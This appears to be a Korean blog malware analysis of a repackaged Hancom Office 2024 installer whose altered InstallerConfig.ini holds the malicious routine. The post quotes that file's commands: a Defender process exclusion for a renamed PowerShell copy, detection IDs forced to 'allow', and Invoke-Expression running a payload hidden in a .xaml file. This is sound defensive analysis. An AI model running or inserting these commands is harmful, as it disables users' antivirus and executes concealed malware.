파일명: Install.exe, setup.exe (동반된 InstallerConfig.ini)
- 유형: 트로이목마 (Downloader/Backdoor)
- 특징: 정상적인 한컴오피스 패키지에 악성 루틴이 담긴 구성 파일을 삽입하여, 설치 과정 중 백신 무력화 및 파워쉘 스크립트를 통한 추가 공격 수행.
정교한 UI 구현
설치창 디자인이 실제 한컴오피스 2024의 인터페이스와 동일
일반 사용자가 실행 화면만 봐서는 의심하기 어려움
실제 로직의 포함
x32dbg 분석 결과, HncUpdateService.exe를 종료하거나 SOFTWARE\HNC 레지스트리 경로를 참조하는 등, 실제 한컴 설치 프로그램이 수행해야 할 정상적인 작업들이 코드 내에 그대로 존재
컴파일 정보의 일치
dnSpy(PE 헤더) 분석 시, 타임스탬프가 2023년으로 찍혀 있고 섹션 구성(.text, .rdata 등)이 전형적인
C++ 실행 파일의 형태를 띠고 있어, 급조된 악성코드가 아닌 정식 빌드된 파일처럼 보임
InstallerConfig.ini ( 악성 행위 설정 파일 )
[ 권한 상승 및 도구 위장 ]
powershell.exe를 vcredist.exe라는 이름으로 복사
[ 보안 제품 무력화 ]
Add-MpPreference -ExclusionProcess 'vcredist.exe': 위장된 파워쉘을 검사 제외 처리
ThreatIDDefaultAction: 특정 악성코드 탐지 ID(2147814524 등)를 '허용(6)'으로
강제 변경하여 공격용 백도어가 탐지되지 않도록 조작
[ 최종 페이로드 실행 ]
Invoke-Expression (Get-Content "ci.xaml" -Raw): 디자인 파일로 위장된
.xaml 내부의 실제 악성 파워쉘 코드를 메모리에서 직접 실행
공격 시나리오
1. 사용자 유도: 한컴오피스 2024 무료 배포 등을 미끼로 악성 패키지 다운로드 유도
2. 설치 시작: 사용자가 Install.exe 실행 (관리자 권한 획득).
3. 보안 무력화: 설치 완료 직전(Post-Install phase), 윈도우 디펜더의 탐지 기능을 마비시키고 파워쉘을 은밀히 실행
4. 백도어 확립: ci.xaml을 통해 공격자 서버(C2)와 연결하거나 키로거, 정보 탈취형 악성코드 추가 설치
최종 분석 결과
| 구분 | 내용 |
| 공격 기법 | 리패키징(Repackaging) 공격 |
| 핵심 수법 | 정상 설치 프로그램의 바이너리는 유지하되, 설치 옵션을 결정하는 외부 설정 파일(.ini)을 변조하여 악성 루틴 삽입 |
| 위험도 | Critical (최상) - 백신을 무력화한 후 시스템 권한을 탈취함 |
'분석 보고서' 카테고리의 다른 글
| 피싱 메일 유입 분석 (악성) (0) | 2026.04.29 |
|---|---|
| PDF 악성으로 탐지 건 분석 (정상 파일) (0) | 2026.04.27 |
| AdobeGenuineInstaller.exe ( 정상파일 ) 분석 (0) | 2026.04.21 |
| DaVuIndy.exe ( 정상파일 ) 분석 (0) | 2026.04.17 |
| TradingView.exe ( Backdoor ) 분석 (0) | 2026.04.16 |
